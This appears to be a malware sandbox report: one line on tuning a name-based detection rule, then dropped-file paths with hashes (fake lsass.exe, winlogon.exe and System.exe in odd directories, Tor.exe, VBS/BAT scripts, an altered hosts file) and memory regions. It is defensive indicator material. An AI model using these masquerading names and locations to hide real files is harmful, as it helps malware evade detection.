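The task rule is the one worth tuning: it fires on the file name alone, so a legitimately relocated binary would also be reported, which is acceptable here because none of the names in the table has a supported reason to run from Recovery\WindowsRE, a Java cursors directory or a user profile.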

Downloads

  • C:\DriverHostCrtNet\KNpp6xs8D.vbe
    Filesize 201B
    MD5 a9feb4bb422aae9305d1c9d7c223dce5
    SHA1 a4e983d8f1b7b21b9edc1fbbe358ea67dc38cf37
    SHA256 22851b07f5b85a7cd0992b1593b973b9e29af03733dd0a86284f0c759bbc2201
    SHA512 da6a69df2fc09304c97979b51027971636328f01bd69dcab955395acf64e1f0c6c9a6aa9fe77d4d53f7fd16146acd332650f3d00cfd8664b6304ef719cbe4255

  • C:\DriverHostCrtNet\System.exe
    Filesize 1.7MB
    MD5 19fc528bbada6d55a39b464c300a110e
    SHA1 4016abebf8f049737e2091dd743c15ff3fa96a73
    SHA256 fd5275c55a974d4078eb7de59aa72ce412ac8bcb6c8249b213fea1e0df329d0f
    SHA512 41ae828bde4fe58fc970cf281b866f9bb4cf2ec1e2e835505ec65b041e134bd9adf9977fe85837a0921668c2cd8fe9fedd30b208c986b51e99c4864c33f02d03

  • C:\DriverHostCrtNet\comSvc.exe
    Filesize 1.7MB
    MD5 08278eef0c4511e2cbfce76266dd90f2
    SHA1 9dd9dee2b7b3b19a6e8271ee443b79bb64eb288b
    SHA256 f9313b93b7c392002e914e4e6af21eb8f5e25f86c37803c64e84ae8d228f2f03
    SHA512 3e5fb401eafb8ddce42fd9bbbd23783941d7540e20edba98fe67e05871d72ac8c89e5a8a5254bc9db62cc74fae596b3c86785650e075e8a1d5b25651d90cadd0

  • C:\DriverHostCrtNet\unV39Cxd.bat
    Filesize 32B
    MD5 39e72d40a9ddaaf86994f941af3f7465
    SHA1 e4b7c6d895cb2ce60391ab1a4363425868b63204
    SHA256 4482b48de5d1a8c39b59f5293ddc7bbcba2af31ff77ebc02e48b68c6a68b0fae
    SHA512 beb0761aaca17016bd7def46956b006f201885f24b1ecce29e75b65199f9196a3cb2461b79734e49f8a2328647f3ae2e741b8afb52d7857d429b0a7b0ef0f4a1

  • C:\Program Files (x86)\Google\Temp\winlogon.exe
    Filesize 1.7MB
    MD5 140ab2669f87f619d65359606c22f762
    SHA1 021da66ad7962c4ac2ff0a05f0f424d1488a6efe
    SHA256 230b332f94351c501872b63e997a5f3a458e6f914835e85bfbf92ee7b1caad8b
    SHA512 4bd5602f850c4b33729a4789fa4540d601e76d9608da0fed16fa6b2573981ea87342f93f2c57aa145ecd63ccfe912c960eb245eb34833f3809892ac07c94857b

  • C:\Program Files (x86)\Google\Update\1.3.36.371\RCXF4C0.tmp
    Filesize 1.7MB
    MD5 db580349ff4238ccf1b33aac144c28ed
    SHA1 2c97445c6c90307879e606da60a9bdcfac9d0a1f
    SHA256 fd94d60527fc981979b222e23e368131e5e1d21cbb53fd71aa67684a308eb46f
    SHA512 e8f1fe0dc62c7061ea2fd8f152a6347b882185a738e31883eb75fe140230b7f64bd9d51ed9af8df2850077c540579430b761f9b00f7645fc4364d9c09127b711

  • C:\Program Files\Java\jre-1.8\lib\images\cursors\RCXE600.tmp
    Filesize 1.7MB
    MD5 dbfa087e264beffa3a0247b3a5989aa5
    SHA1 f1fc7b83a480cc49d17d7a91f92e2bef54ae4048
    SHA256 5d59ce562d799c6e0ce33d30ad5095c7432cd71ce66f4594377e28ae3a031533
    SHA512 198b3cab56b8c38d4bac0b4fcb7e995e7a4eaf64432a35f268a6d135ffe91d3dd2fcd3c1f0b7d38b993dc5aacc0c07d70c21a46d7dfcd4ecc1b96bcfba80dda2

  • C:\Program Files\Windows Multimedia Platform\lsass.exe
    Filesize 1.7MB
    MD5 e3c6c535f8752fd171107b16aeea7e17
    SHA1 32acd7d8666b85ae37f3d0e49a68bead46f5e81c
    SHA256 a1ee8260f0ddb99fd706b31df2d201373b0e938c292eb8b02c56ada04d3d14fd
    SHA512 5516a4ae426ac4fa1654e83bf2255c7d94061aec51ca89c479796777d3633cf93536072e6c028afe1e9dc8e0aa6f447b3bee4d602835d2216b988e016e66e717

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log
    Filesize 1KB
    MD5 3ad9a5252966a3ab5b1b3222424717be
    SHA1 5397522c86c74ddbfb2585b9613c794f4b4c3410
    SHA256 27525f5fc7871c6828ab5173315e95b5c7e918d2ee532781c562c378584b5249

                SHA512

                b1a745f7a0f33b777ffc34f74f42752144d9f2d06b8bc613e703570494762b3af87e153212c3274b18af14f17b8619e2f350b7c3cc11228f7d4208d4251e90e6

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                Filesize

                3KB

                MD5

                223bd4ae02766ddc32e6145fd1a29301

                SHA1

                900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

                SHA256

                1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

                SHA512

                648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                5b9a7ee9a9286faef39bbe9cac042fd4

                SHA1

                cb3ef3c9e19781c45ffd9e2902e5b0ed38c0e2c3

                SHA256

                a6d5d07c333b6a68534ebc0ee23ea49e77a67f26597e4bd5bcc8dfd216e6a348

                SHA512

                ea14a4932134952864bd1b0ccdfd6ad45ed650a9bc52589f6d21fc4382a6237c6bbce1c016482b4a68cd609dadea234726927ba0f26e9443a6b970209281f450

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                cadef9abd087803c630df65264a6c81c

                SHA1

                babbf3636c347c8727c35f3eef2ee643dbcc4bd2

                SHA256

                cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

                SHA512

                7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                2e907f77659a6601fcc408274894da2e

                SHA1

                9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

                SHA256

                385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

                SHA512

                34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                bd5940f08d0be56e65e5f2aaf47c538e

                SHA1

                d7e31b87866e5e383ab5499da64aba50f03e8443

                SHA256

                2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

                SHA512

                c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                e8ce785f8ccc6d202d56fefc59764945

                SHA1

                ca032c62ddc5e0f26d84eff9895eb87f14e15960

                SHA256

                d85c19fc6b9d25e2168a2cc50ff38bd226fbf4f02aa7ac038a5f319522d2ffa4

                SHA512

                66460aec4afee582556270f8ee6048d130a090f1c12a2632ed71a99a4073e9931e9e1cc286e32debffb95a90bd955f0f0d6ec891b1c5cd2f0aae41eb6d25832f

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                e243a38635ff9a06c87c2a61a2200656

                SHA1

                ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

                SHA256

                af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

                SHA512

                4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                e1d7973fb9071815b4241da5ec0dfb6a

                SHA1

                41f06afbd0ac9f9a0b226a2dd6fa9495d83209b9

                SHA256

                b3953ac9f5752d996ec2545864d6ccf09ffe4b0f84f41a2cc52a95ad8103212b

                SHA512

                66163114aba8867561ceac2124bc2060c351cb4a83c4f8d40bc6bfd8042881690ea8152e2b58ec55b4b6de17e1610642c90df602e1fb2658b4c3d0783f3a0900

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                4cb59d549e8c5d613ea4b7524088528a

                SHA1

                5bdfb9bc4920177a9e5d4b9c93df65383353ab22

                SHA256

                a4ac74b80eadcb876402dc2842d706a249691176dd838a6100a8c26bfa87811a

                SHA512

                a9f5bde138142665e056b1e2f40c16cff0c9a6a6907f038c4685275df66ceea39d9fca9a1c72529b2287632e0669346efb06ff302b0199764cca45b23faa4b52

              • C:\Users\Admin\AppData\Local\Temp\09dcb6ba-2fbe-4e02-acba-0a7b176ef713.vbs

                Filesize

                482B

                MD5

                68a095c7021a6ccc4d3a17d93f9e86bd

                SHA1

                0f6ea77ee95e3bba5a67a266d2f2e2a6df9bc3ce

                SHA256

                4744ed0a3de93248e8a4c3ce9e8f133387a8ccf437c5b57bb18dd99723f1b4f5

                SHA512

                b33abc8b188040b6c89c3f2310a20d0980cf08bbf2c5a479a82af39cf52119525d3fbcba2ca7ea2193bff35655f2cfdf5211fa6cd79624912876ed918e186f28

              • C:\Users\Admin\AppData\Local\Temp\41a9a8e6-06e8-42ac-bf79-d2643ae41989.vbs

                Filesize

                706B

                MD5

                d5fd9d27d73330bf57ded1888870d647

                SHA1

                8a97cd2488b3e6a3c630fd38de221f3a399d36b4

                SHA256

                8b2b064865036539bbcc1f94caaa6f9eb94b81cc9589e06b55cd19ae8c4e00df

                SHA512

                dfaa890f12484ebc19e4956bf7d0eff449f42da756392095721307288c24b438655b81ee6cc5d7f9cccf5ed1958e9d59ba5c56bd490fb380b300be3516b1ef86

              • C:\Users\Admin\AppData\Local\Temp\Tor.exe

                Filesize

                2.0MB

                MD5

                e235a410c3e0c9432f755940e7d5ac61

                SHA1

                b94f875771c83acbcdcd3c788dc8002eaf91438f

                SHA256

                a77e85defe720361ffa22bc96fe3c82366c3ef61dd931bdf0e0326aa984a33b3

                SHA512

                6d3c3650441b48e37ca1352d9f38a66a6376741439db8efc9f765de5df7506400e5ea5174d28734e2876889f242bc9ab7e8e5013c18575b5ccb7493bd8e2b33f

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qoxjkbk4.f15.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Local\Temp\ft.exe

                Filesize

                4.0MB

                MD5

                e84cc0620cc96970d2e1a8d0017000a6

                SHA1

                3e06e2f55642880f6b3738f462a60bc4d84f68ba

                SHA256

                17df34146d3c1442f4b303e9536dd207424eb4d07d90a54f8b4cef20f40d43a8

                SHA512

                d902fa5eed92eafc6f11f2a5d3e49020948e6c152d5c34a09c6d42b47ec2319da4ee5f63f38dd658da3f846e9495ad93ae3f9cfa834d827a59e9bc3ce5bd10f0

              • C:\Windows\System32\drivers\etc\hosts

                Filesize

                3KB

                MD5

                7a47afdf68d97d678987c9d60eab9086

                SHA1

                1e03088721b6c7d0aab59e80f12238837793f051

                SHA256

                860d78899a84ae7c858183ff0eab215ee0f36febfdfd766a2fb6d429895da669

                SHA512

                9dc0cbcefc921689582ed163c767c7c0b681236d499cf962ade0415a2b0fcd7d501e682a0ea3c385f7d039d3de94bb0b40c001851b1dd4c0d05c7fb26b65881c

              • memory/1664-41-0x00007FF8334D0000-0x00007FF833F91000-memory.dmp

                Filesize

                10.8MB

              • memory/1664-15-0x00007FF8334D0000-0x00007FF833F91000-memory.dmp

                Filesize

                10.8MB

              • memory/1664-12-0x0000022EE1350000-0x0000022EE1372000-memory.dmp

                Filesize

                136KB

              • memory/1664-13-0x00007FF8334D0000-0x00007FF833F91000-memory.dmp

                Filesize

                10.8MB

              • memory/1664-14-0x00007FF8334D0000-0x00007FF833F91000-memory.dmp

                Filesize

                10.8MB

              • memory/3320-451-0x000000001B170000-0x000000001B182000-memory.dmp

                Filesize

                72KB

              • memory/3320-450-0x0000000000440000-0x00000000005F6000-memory.dmp

                Filesize

                1.7MB

              • memory/4304-1-0x0000000000B80000-0x0000000000BAE000-memory.dmp

                Filesize

                184KB

              • memory/4304-0-0x00007FF8334D3000-0x00007FF8334D5000-memory.dmp

                Filesize

                8KB

              • memory/4404-73-0x0000000002540000-0x0000000002550000-memory.dmp

                Filesize

                64KB

              • memory/4404-78-0x000000001AF80000-0x000000001AF8C000-memory.dmp

                Filesize

                48KB

              • memory/4404-83-0x000000001B820000-0x000000001B82C000-memory.dmp

                Filesize

                48KB

              • memory/4404-84-0x000000001B830000-0x000000001B83A000-memory.dmp

                Filesize

                40KB

              • memory/4404-85-0x000000001B840000-0x000000001B848000-memory.dmp

                Filesize

                32KB

              • memory/4404-87-0x000000001B960000-0x000000001B96C000-memory.dmp

                Filesize

                48KB

              • memory/4404-86-0x000000001B950000-0x000000001B95C000-memory.dmp

                Filesize

                48KB

              • memory/4404-79-0x000000001B700000-0x000000001B708000-memory.dmp

                Filesize

                32KB

              • memory/4404-82-0x000000001B710000-0x000000001B71C000-memory.dmp

                Filesize

                48KB

              • memory/4404-67-0x0000000000150000-0x0000000000306000-memory.dmp

                Filesize

                1.7MB

              • memory/4404-77-0x000000001AF90000-0x000000001AFA0000-memory.dmp

                Filesize

                64KB

              • memory/4404-72-0x0000000002420000-0x0000000002428000-memory.dmp

                Filesize

                32KB

              • memory/4404-75-0x000000001AF70000-0x000000001AF82000-memory.dmp

                Filesize

                72KB

              • memory/4404-74-0x000000001AF50000-0x000000001AF66000-memory.dmp

                Filesize

                88KB

              • memory/4404-70-0x000000001AFA0000-0x000000001AFF0000-memory.dmp

                Filesize

                320KB

              • memory/4404-69-0x000000001AF30000-0x000000001AF4C000-memory.dmp

                Filesize

                112KB

              • memory/4876-115-0x00007FF61D540000-0x00007FF61D944000-memory.dmp

                Filesize

                4.0MB

              • memory/5280-487-0x0000000001970000-0x0000000001982000-memory.dmp

                Filesize

                72KB